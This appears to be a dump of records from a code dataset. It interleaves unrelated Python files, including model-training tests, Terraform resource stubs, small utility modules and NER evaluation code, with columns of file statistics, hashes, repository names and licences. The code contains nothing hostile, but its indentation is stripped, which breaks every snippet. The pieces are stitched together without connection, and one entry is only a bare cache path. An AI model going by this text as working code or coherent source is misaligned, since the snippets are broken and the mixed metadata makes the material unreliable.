trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_psql_forward_resnetfusionpolicy_att(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18fusionpolicy",
"runner/dataset=psqltextbertforwardsatosapolicy",
"runner.runner_name=SOCTextForwardPolicyRunner",
"runner.model.self_att_fusion=false",
"runner.dataset.set_empty_text_to_zero=true",
]
)
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.setup_dataset = self.setup_text_dataset
runner.num_workers = 1
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_preprocessed_forward_resnetfusionpolicy_self_attention(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18fusionpolicy",
"runner/dataset=preprocessedtextbertforwardsatosapolicy",
"runner.runner_name=SOCTextForwardPolicyRunner"
]
)
config.runner.dataset.dataset_path = _TEXT_BERT_DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.num_workers = 1
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_psql_forward_resnetmeanconcatpolicy(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18meanconcatpolicy",
"runner/dataset=psqltextbertforwardsatosapolicy",
"runner.runner_name=SOCTextForwardPolicyRunner"
]
)
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.setup_dataset = self.setup_text_dataset
runner.num_workers = 1
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_file_forward_resnetmeanconcatpolicy(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18meanconcatpolicy",
"runner/dataset=filetextbertforwardsatosapolicy",
"runner.runner_name=SOCTextForwardPolicyRunner"
]
)
config.runner.dataset.dataset_path = _RAW_TEXT_BERT_DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.num_workers = 1
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_file_forward_resnetmeanffpolicy(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18meanffpolicy",
"runner/dataset=filetextbertforwardsatosapolicy",
"runner.runner_name=SOCTextForwardPolicyRunner"
]
)
config.runner.dataset.dataset_path = _RAW_TEXT_BERT_DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.num_workers = 1
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_file_humantrade_forward_resnetmeanffpolicy(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18meanffpolicy",
"runner/dataset=filetextberthumantradeforwardsatosapolicy",
"runner.runner_name=SOCTextForwardPolicyRunner"
]
)
config.runner.dataset.dataset_path = _RAW_TEXT_BERT_DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.num_workers = 1
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
| 42.693878
| 99
| 0.609524
| 1,675
| 16,736
| 5.809552
| 0.113433
| 0.041928
| 0.019525
| 0.024458
| 0.7881
| 0.780084
| 0.743911
| 0.722125
| 0.709382
| 0.637036
| 0
| 0.005631
| 0.289077
| 16,736
| 391
| 100
| 42.803069
| 0.812237
| 0.006393
| 0
| 0.564327
| 0
| 0
| 0.171839
| 0.111693
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076023
| false
| 0
| 0.040936
| 0.01462
| 0.149123
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
85c47c850d97ede05f08346a4ba158dab2d66968
| 155
|
py
|
Python
|
aitu_data_extractors/routers/base.py
|
Toffooo/aituio
|
a4382f2d857cf8a5dd3b44bbc5fa93203c2eec28
|
[
"MIT"
] | null | null | null |
aitu_data_extractors/routers/base.py
|
Toffooo/aituio
|
a4382f2d857cf8a5dd3b44bbc5fa93203c2eec28
|
[
"MIT"
] | null | null | null |
aitu_data_extractors/routers/base.py
|
Toffooo/aituio
|
a4382f2d857cf8a5dd3b44bbc5fa93203c2eec28
|
[
"MIT"
] | null | null | null |
from aitu_data_extractors.utils import read_json
from settings import ABS_PATH
LINKS = read_json(f"{ABS_PATH}/aitu_data_extractors/Resources/links.json")
| 31
| 74
| 0.845161
| 25
| 155
| 4.92
| 0.56
| 0.130081
| 0.292683
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077419
| 155
| 4
| 75
| 38.75
| 0.86014
| 0
| 0
| 0
| 0
| 0
| 0.335484
| 0.335484
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
85c5fb40a8ee980e1d09db854f36914e17733145
| 116
|
py
|
Python
|
tests/test_dummy.py
|
clbarras/pyannote-audio
|
f70ce115022b64572bb5895e21088f4ae1023737
|
[
"MIT"
] | 1
|
2020-02-24T04:30:14.000Z
|
2020-02-24T04:30:14.000Z
|
tests/test_dummy.py
|
gitkob/pyannote-audio
|
73c4fe7311d4a1314f18c11fea60aca6bc7e5359
|
[
"MIT"
] | null | null | null |
tests/test_dummy.py
|
gitkob/pyannote-audio
|
73c4fe7311d4a1314f18c11fea60aca6bc7e5359
|
[
"MIT"
] | null | null | null |
import pytest
from pyannote.core import Segment
def test_dummy():
assert isinstance(Segment(1., 2.), Segment)
| 16.571429
| 47
| 0.741379
| 16
| 116
| 5.3125
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020408
| 0.155172
| 116
| 6
| 48
| 19.333333
| 0.846939
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
a41bfd6e9601e27dd87391af7a4209c13b0ee4e9
| 90
|
py
|
Python
|
examples/grid-compute/scripts/example.py
|
diaperrash/cloudify-azure-plugin
|
dc495c294931168b012b60427e36e5a0738f2292
|
[
"Apache-2.0"
] | 2
|
2018-08-16T01:50:35.000Z
|
2018-11-17T20:31:37.000Z
|
examples/grid-compute/scripts/example.py
|
diaperrash/cloudify-azure-plugin
|
dc495c294931168b012b60427e36e5a0738f2292
|
[
"Apache-2.0"
] | 43
|
2017-05-18T12:31:42.000Z
|
2019-01-08T09:20:42.000Z
|
examples/grid-compute/scripts/example.py
|
diaperrash/cloudify-azure-plugin
|
dc495c294931168b012b60427e36e5a0738f2292
|
[
"Apache-2.0"
] | 13
|
2015-07-09T10:49:55.000Z
|
2021-05-06T09:24:30.000Z
|
from cloudify import ctx
ctx.logger.info('Hello, my instance ID is %s', ctx.instance.id)
| 22.5
| 63
| 0.744444
| 16
| 90
| 4.1875
| 0.75
| 0.298507
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 90
| 3
| 64
| 30
| 0.858974
| 0
| 0
| 0
| 0
| 0
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
a42ff4c15610b76a6f401465dcfbfeb61d1211bf
| 127
|
py
|
Python
|
gltbx/glu.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
gltbx/glu.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
gltbx/glu.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
from __future__ import division
import boost.python
ext = boost.python.import_ext("gltbx_glu_ext")
from gltbx_glu_ext import *
| 25.4
| 46
| 0.826772
| 20
| 127
| 4.8
| 0.45
| 0.229167
| 0.229167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102362
| 127
| 4
| 47
| 31.75
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0.102362
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
f10a8bd185573250976b7d75465158a8be8ab862
| 192
|
py
|
Python
|
exercicios/lista1/exercicio27.py
|
lagcrs/algoritmos
|
5ee860c71db8ac2ef8bbe6cc87726938b1ca9c72
|
[
"Apache-2.0"
] | null | null | null |
exercicios/lista1/exercicio27.py
|
lagcrs/algoritmos
|
5ee860c71db8ac2ef8bbe6cc87726938b1ca9c72
|
[
"Apache-2.0"
] | null | null | null |
exercicios/lista1/exercicio27.py
|
lagcrs/algoritmos
|
5ee860c71db8ac2ef8bbe6cc87726938b1ca9c72
|
[
"Apache-2.0"
] | null | null | null |
diagonal_maior = float(input('Diagonal maior: '))
diagonal_menor = float(input('Diagonal menor: '))
area = (diagonal_maior * diagonal_menor) / 2
print(f'Area de um losango: {area:.2f}')
| 32
| 50
| 0.697917
| 26
| 192
| 5
| 0.5
| 0.3
| 0.276923
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012195
| 0.145833
| 192
| 6
| 51
| 32
| 0.780488
| 0
| 0
| 0
| 0
| 0
| 0.329787
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
f1204e27c390f944e1df97a84347e2c18478915b
| 128
|
py
|
Python
|
upf_to_json/__init__.py
|
simonpintarelli/upf_to_json
|
498c0591a0383b1642f6c5321b36e688d4b971d3
|
[
"BSD-2-Clause"
] | 2
|
2019-11-10T05:18:16.000Z
|
2020-11-27T08:16:43.000Z
|
upf_to_json/__init__.py
|
simonpintarelli/upf_to_json
|
498c0591a0383b1642f6c5321b36e688d4b971d3
|
[
"BSD-2-Clause"
] | null | null | null |
upf_to_json/__init__.py
|
simonpintarelli/upf_to_json
|
498c0591a0383b1642f6c5321b36e688d4b971d3
|
[
"BSD-2-Clause"
] | 2
|
2020-11-28T00:06:13.000Z
|
2022-01-20T19:46:34.000Z
|
""" UPF converter """
from __future__ import absolute_import
from .upf_to_json import upf_to_json
__all__ = ('upf_to_json',)
| 16
| 38
| 0.757813
| 19
| 128
| 4.315789
| 0.473684
| 0.182927
| 0.329268
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140625
| 128
| 7
| 39
| 18.285714
| 0.745455
| 0.101563
| 0
| 0
| 0
| 0
| 0.102804
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
f12c1065c7ea77e833a4a9617d901de45af17d4b
| 221
|
py
|
Python
|
cfg/audio/__main__.py
|
rr-/dotfiles
|
4a684c43a5714a3312b42b445e5ba9ae1fab0d1a
|
[
"MIT"
] | 16
|
2015-06-05T12:57:44.000Z
|
2021-08-05T23:49:42.000Z
|
cfg/audio/__main__.py
|
rr-/dotfiles
|
4a684c43a5714a3312b42b445e5ba9ae1fab0d1a
|
[
"MIT"
] | 6
|
2015-11-01T18:18:26.000Z
|
2020-10-06T09:17:29.000Z
|
cfg/audio/__main__.py
|
rr-/dotfiles
|
4a684c43a5714a3312b42b445e5ba9ae1fab0d1a
|
[
"MIT"
] | 6
|
2015-10-31T18:53:12.000Z
|
2020-11-30T18:03:06.000Z
|
from libdotfiles.packages import try_install
from libdotfiles.util import run
try_install("alsa-utils")
try_install("pulseaudio")
try_install("pulseaudio-bluetooth")
try_install("pavucontrol")
run(["pulseaudio", "-D"])
| 22.1
| 44
| 0.791855
| 28
| 221
| 6.071429
| 0.5
| 0.294118
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072398
| 221
| 9
| 45
| 24.555556
| 0.829268
| 0
| 0
| 0
| 0
| 0
| 0.285068
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.285714
| 0
| 0.285714
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
f15741d2ac34d48affedc902127162369de64ee0
| 1,557
|
py
|
Python
|
terrascript/resource/cappyzawa/artifactory.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
terrascript/resource/cappyzawa/artifactory.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
terrascript/resource/cappyzawa/artifactory.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# terrascript/resource/cappyzawa/artifactory.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:11:58 UTC)
import terrascript
class artifactory_access_token(terrascript.Resource):
pass
class artifactory_api_key(terrascript.Resource):
pass
class artifactory_certificate(terrascript.Resource):
pass
class artifactory_group(terrascript.Resource):
pass
class artifactory_local_repository(terrascript.Resource):
pass
class artifactory_permission_target(terrascript.Resource):
pass
class artifactory_permission_targets(terrascript.Resource):
pass
class artifactory_remote_repository(terrascript.Resource):
pass
class artifactory_replication_config(terrascript.Resource):
pass
class artifactory_single_replication_config(terrascript.Resource):
pass
class artifactory_user(terrascript.Resource):
pass
class artifactory_virtual_repository(terrascript.Resource):
pass
class artifactory_xray_policy(terrascript.Resource):
pass
class artifactory_xray_watch(terrascript.Resource):
pass
__all__ = [
"artifactory_access_token",
"artifactory_api_key",
"artifactory_certificate",
"artifactory_group",
"artifactory_local_repository",
"artifactory_permission_target",
"artifactory_permission_targets",
"artifactory_remote_repository",
"artifactory_replication_config",
"artifactory_single_replication_config",
"artifactory_user",
"artifactory_virtual_repository",
"artifactory_xray_policy",
"artifactory_xray_watch",
]
| 19.961538
| 73
| 0.788696
| 157
| 1,557
| 7.464968
| 0.261147
| 0.243174
| 0.274744
| 0.31058
| 0.511092
| 0.311433
| 0.095563
| 0
| 0
| 0
| 0
| 0.008935
| 0.137444
| 1,557
| 77
| 74
| 20.220779
| 0.863738
| 0.075145
| 0
| 0.311111
| 1
| 0
| 0.248434
| 0.212248
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.311111
| 0.022222
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
f16d66e060ce8ff7bbafc50ed1b21e61fe34f779
| 144
|
py
|
Python
|
demoproject/demoproject/templatetags/demo_tags.py
|
tickettext/django-nvd3
|
76656b24a4d028cb4ee2231d1487b5ec70c42203
|
[
"MIT"
] | 1
|
2015-11-26T17:44:47.000Z
|
2015-11-26T17:44:47.000Z
|
demoproject/demoproject/templatetags/demo_tags.py
|
Star2Billing/django-nvd3
|
8184561dfc45287200692c10e7dcedc8a8cbccb1
|
[
"MIT"
] | null | null | null |
demoproject/demoproject/templatetags/demo_tags.py
|
Star2Billing/django-nvd3
|
8184561dfc45287200692c10e7dcedc8a8cbccb1
|
[
"MIT"
] | null | null | null |
#from django import template
from django.template.defaultfilters import register
@register.filter
def demo(value):
return 'demo-' + value
| 18
| 51
| 0.770833
| 18
| 144
| 6.166667
| 0.611111
| 0.18018
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145833
| 144
| 7
| 52
| 20.571429
| 0.902439
| 0.1875
| 0
| 0
| 0
| 0
| 0.043103
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
f16f3bcc643b5dc9e0eb4cb54d22fd772e3ba3d0
| 36
|
py
|
Python
|
tests/__init__.py
|
stcstores/scurri
|
10b5358df45a74188f8a0744842b28b6e7f6c15a
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
stcstores/scurri
|
10b5358df45a74188f8a0744842b28b6e7f6c15a
|
[
"MIT"
] | 13
|
2021-09-22T01:22:15.000Z
|
2022-03-21T01:31:18.000Z
|
tests/__init__.py
|
stcstores/scurri
|
10b5358df45a74188f8a0744842b28b6e7f6c15a
|
[
"MIT"
] | null | null | null |
"""Tests for the scurri library."""
| 18
| 35
| 0.666667
| 5
| 36
| 4.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138889
| 36
| 1
| 36
| 36
| 0.774194
| 0.805556
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
f185929589762f5ef780aab877bb29f23d3b32d6
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/requests_toolbelt/auth/_digest_auth_compat.py
|
GiulianaPola/select_repeats
|
17a0d053d4f874e42cf654dd142168c2ec8fbd11
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/requests_toolbelt/auth/_digest_auth_compat.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/requests_toolbelt/auth/_digest_auth_compat.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/25/aa/6e/d2ef0ac15dc815b462126cebc5547a33120d9e999b3d8784ab287fcdb3
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.395833
| 0
| 96
| 1
| 96
| 96
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
f18f24b75542d81574b224367a62288f34d26b31
| 164
|
py
|
Python
|
python_data_utils/__init__.py
|
surajiyer/python-data-utils
|
d6e9bf81204a01545a3edb165c5724eb24f37c18
|
[
"MIT"
] | 4
|
2019-01-06T00:09:21.000Z
|
2022-01-28T06:03:13.000Z
|
python_data_utils/__init__.py
|
surajiyer/python-data-utils
|
d6e9bf81204a01545a3edb165c5724eb24f37c18
|
[
"MIT"
] | null | null | null |
python_data_utils/__init__.py
|
surajiyer/python-data-utils
|
d6e9bf81204a01545a3edb165c5724eb24f37c18
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
description: Python data utility functions and classes
author: Suraj Iyer
"""
from .about import __version__
from . import decorators
| 16.4
| 58
| 0.719512
| 20
| 164
| 5.7
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007634
| 0.20122
| 164
| 9
| 59
| 18.222222
| 0.862595
| 0.536585
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
74e6d561991ae6d2f456ac60615af15a775b44bb
| 81
|
py
|
Python
|
aiohttp_aiocache/__init__.py
|
nobbynobbs/aiohttp-aiocache
|
316bb6ce0269757848de9055a53c35cda0da71c4
|
[
"MIT"
] | 2
|
2020-10-16T04:05:44.000Z
|
2021-02-19T18:59:56.000Z
|
aiohttp_aiocache/__init__.py
|
nobbynobbs/aiohttp-aiocache
|
316bb6ce0269757848de9055a53c35cda0da71c4
|
[
"MIT"
] | null | null | null |
aiohttp_aiocache/__init__.py
|
nobbynobbs/aiohttp-aiocache
|
316bb6ce0269757848de9055a53c35cda0da71c4
|
[
"MIT"
] | null | null | null |
from ._api import cached, register_cache
__all__ = ["cached", "register_cache"]
| 20.25
| 40
| 0.753086
| 10
| 81
| 5.4
| 0.7
| 0.518519
| 0.703704
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123457
| 81
| 3
| 41
| 27
| 0.760563
| 0
| 0
| 0
| 0
| 0
| 0.246914
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
2d2b418599defab31d746f21556f44eb5f50b92f
| 61,203
|
py
|
Python
|
interpret_eval/tasks/src/errorAnalysis.py
|
Tahmid04/ExplainaBoard
|
640052f84c0cb61c12e0952fb3c435b3f926f6ab
|
[
"MIT"
] | null | null | null |
interpret_eval/tasks/src/errorAnalysis.py
|
Tahmid04/ExplainaBoard
|
640052f84c0cb61c12e0952fb3c435b3f926f6ab
|
[
"MIT"
] | null | null | null |
interpret_eval/tasks/src/errorAnalysis.py
|
Tahmid04/ExplainaBoard
|
640052f84c0cb61c12e0952fb3c435b3f926f6ab
|
[
"MIT"
] | null | null | null |
import numpy as np
import pickle
import codecs
import os
from collections import Counter
import re
import math
import scipy.stats as statss
import json
import random
import numpy
import codecs
from seqeval.metrics import precision_score, recall_score, f1_score
#from sklearn.metrics import f1_score
from nltk.tokenize import TweetTokenizer
from collections import OrderedDict
from random import choices
import scipy.stats
import csv
def get_chunks(seq):
"""
tags:dic{'per':1,....}
Args:
seq: [4, 4, 0, 0, ...] sequence of labels
tags: dict["O"] = 4
Returns:
list of (chunk_type, chunk_start, chunk_end)
Example:
seq = [4, 5, 0, 3]
tags = {"B-PER": 4, "I-PER": 5, "B-LOC": 3}
result = [("PER", 0, 2), ("LOC", 3, 4)]
"""
default = 'O'
# idx_to_tag = {idx: tag for tag, idx in tags.items()}
chunks = []
chunk_type, chunk_start = None, None
for i, tok in enumerate(seq):
#End of a chunk 1
if tok == default and chunk_type is not None:
# Add a chunk.
chunk = (chunk_type, chunk_start, i)
chunks.append(chunk)
chunk_type, chunk_start = None, None
# End of a chunk + start of a chunk!
elif tok != default:
tok_chunk_class, tok_chunk_type = get_chunk_type(tok)
if chunk_type is None:
chunk_type, chunk_start = tok_chunk_type, i
elif tok_chunk_type != chunk_type or tok_chunk_class == "B":
chunk = (chunk_type, chunk_start, i)
chunks.append(chunk)
chunk_type, chunk_start = tok_chunk_type, i
else:
pass
# end condition
if chunk_type is not None:
chunk = (chunk_type, chunk_start, len(seq))
chunks.append(chunk)
return chunks
def get_chunk_type(tok):
"""
Args:
tok: id of token, ex 4
idx_to_tag: dictionary {4: "B-PER", ...}
Returns:
tuple: "B", "PER"
"""
# tag_name = idx_to_tag[tok]
tag_class = tok.split('-')[0]
tag_type = tok.split('-')[-1]
return tag_class, tag_type
# def run_evaluate(self, sess, test, tags):
def evaluate(words,labels_pred, labels):
"""
labels_pred, labels, words: are sent-level list
eg: words --> [[i love shanghai],[i love u],[i do not know]]
words,pred, right: is a sequence, is label index or word index.
Evaluates performance on test set
"""
# true_tags = ['PER', 'LOC', 'ORG', 'PERSON', 'person', 'loc', 'company']
accs = []
correct_preds, total_correct, total_preds = 0., 0., 0.
for lab, lab_pred, word_sent in zip(labels, labels_pred, words):
accs += [a == b for (a, b) in zip(lab, lab_pred)]
lab_chunks = set(get_chunks(lab))
lab_pred_chunks = set(get_chunks(lab_pred))
correct_preds += len(lab_chunks & lab_pred_chunks)
total_preds += len(lab_pred_chunks)
total_correct += len(lab_chunks)
p = correct_preds / total_preds if correct_preds > 0 else 0
r = correct_preds / total_correct if correct_preds > 0 else 0
f1 = 2 * p * r / (p + r) if correct_preds > 0 else 0
acc = np.mean(accs)
return acc, f1, p, r
def evaluate_each_class(words,labels_pred, labels,class_type):
# class_type:PER or LOC or ORG
index = 0
accs = []
correct_preds, total_correct, total_preds = 0., 0., 0.
correct_preds_cla_type, total_preds_cla_type, total_correct_cla_type = 0., 0., 0.
for lab, lab_pred, word_sent in zip(labels, labels_pred, words):
lab_pre_class_type = []
lab_class_type = []
# accs += [a==b for (a, b) in zip(lab, lab_pred)]
lab_chunks = get_chunks(lab)
lab_pred_chunks = get_chunks(lab_pred)
for i in range(len(lab_pred_chunks)):
if lab_pred_chunks[i][0] == class_type:
lab_pre_class_type.append(lab_pred_chunks[i])
lab_pre_class_type_c = set(lab_pre_class_type)
for i in range(len(lab_chunks)):
if lab_chunks[i][0] == class_type:
lab_class_type.append(lab_chunks[i])
lab_class_type_c = set(lab_class_type)
lab_chunksss = set(lab_chunks)
correct_preds_cla_type += len(lab_pre_class_type_c & lab_chunksss)
total_preds_cla_type += len(lab_pre_class_type_c)
total_correct_cla_type += len(lab_class_type_c)
p = correct_preds_cla_type / total_preds_cla_type if correct_preds_cla_type > 0 else 0
r = correct_preds_cla_type / total_correct_cla_type if correct_preds_cla_type > 0 else 0
f1 = 2 * p * r / (p + r) if correct_preds_cla_type > 0 else 0
